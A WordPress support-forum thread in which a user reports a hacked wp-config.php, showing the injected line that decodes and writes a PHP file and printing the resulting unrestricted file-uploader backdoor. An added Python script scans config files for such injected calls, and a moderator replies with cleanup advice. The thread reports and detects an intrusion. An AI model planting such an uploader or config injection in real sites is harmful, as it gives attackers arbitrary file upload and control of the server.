• Hi There,

    I want to report that someone has uploaded a PHP uploader script through wp-config.php.

    The wp-config.php became like this:

    // ** MySQL settings - You can get this info from your web host ** //
    /** The name of the database for WordPress */
    define('DB_NAME', 'wordpress'); file_put_contents("wp-upload-class.php", base64_decode('code removed by moderator')); /*');
    
    /** MySQL database username */
    define('DB_USER', 'user');
    
    /** MySQL database password */
    define('DB_PASSWORD', 'password');
    
    /** MySQL hostname */
    define('DB_HOST', 'localhost:');
    
    /** Database Charset to use in creating database tables. */
    define('DB_CHARSET', 'utf8mb4');
    
    /** The Database Collate type. Don't change this if in doubt. */
    define('DB_COLLATE', '');

    Also, they successfully created wp-upload-class.php
    with an uploader script, which was encoded as Base64:

    <?php
    echo "This shit works!";
    if (isset($_FILES["filename"]))
    {
       if($_FILES["filename"]["size"] > 1024*3*1024)
       {
         echo ("File too large (more than 3Mb)");
         exit;
       }
       if(is_uploaded_file($_FILES["filename"]["tmp_name"]))
       {
         move_uploaded_file($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
         echo ("<br>Done!<br>");
       } else {
          echo("<br>Error! ".$php_errormsg."<br>");
       }
    }
    ?>

    Please fix it. I don’t know if anybody has been attacked with the same method or not.
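
As an added example (not part of the original post, and not WordPress code), here is one way to detect the tampering shown above: a Python check that blanks out comments and string literals in wp-config.php, then flags code trailing a `define()` and calls such as `file_put_contents()` or `base64_decode()`. The function names, the list of flagged calls and the sample input are assumptions made for this illustration; heredoc strings are not handled.

```python
import re

# Calls a stock wp-config.php never makes (assumed list; extend as needed).
SUSPICIOUS = ("file_put_contents", "base64_decode", "eval", "assert", "system", "exec", "passthru")

def strip_literals(src):
    """Blank out PHP comments and quoted strings, keeping newlines for line numbers."""
    out, i, n = [], 0, len(src)
    while i < n:
        two = src[i:i + 2]
        if two == "/*":                      # block comment, possibly unterminated
            j = src.find("*/", i + 2)
            j = n if j < 0 else j + 2
        elif two == "//" or src[i] == "#":   # line comment
            j = src.find("\n", i)
            j = n if j < 0 else j
        elif src[i] in "'\"":                # quoted string with backslash escapes
            j = i + 1
            while j < n and src[j] != src[i]:
                j += 2 if src[j] == "\\" else 1
            j = min(j + 1, n)
        else:                                # ordinary code character: keep it
            out.append(src[i])
            i += 1
            continue
        out.append(re.sub(r"[^\n]", " ", src[i:j]))
        i = j
    return "".join(out)

def scan_config(src):
    """Return (line, reason) findings: risky calls, or code trailing a define()."""
    findings = []
    for lineno, code in enumerate(strip_literals(src).split("\n"), 1):
        for name in SUSPICIOUS:
            if re.search(r"\b%s\s*\(" % name, code):
                findings.append((lineno, "call to %s()" % name))
        m = re.search(r"\bdefine\s*\([^;]*\)\s*;(.*)", code)
        if m and m.group(1).strip():
            findings.append((lineno, "extra code after define()"))
    return findings

# Constructed sample mirroring the tampered line in the post (payload is a placeholder).
TAMPERED = """<?php
define('DB_NAME', 'wordpress'); file_put_contents("wp-upload-class.php", base64_decode('PLACEHOLDER')); /*');
/** MySQL database username */
define('DB_USER', 'user');
"""
if __name__ == "__main__":
    print(scan_config(TAMPERED))
```

Because literals are blanked before matching, a constant whose value merely contains text like `eval(` is not flagged; only code that PHP would actually execute is.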

Viewing 1 replies (of 1 total)
  • Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    There’s nothing for us to fix. Your site was hacked; somehow someone got to your wp-config.php file. There are a number of ways for that to happen.

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Note: moved from alpha/beta to fixing wordpress.

  • The topic ‘Upload PHP Script through wp-config.php’ is closed to new replies.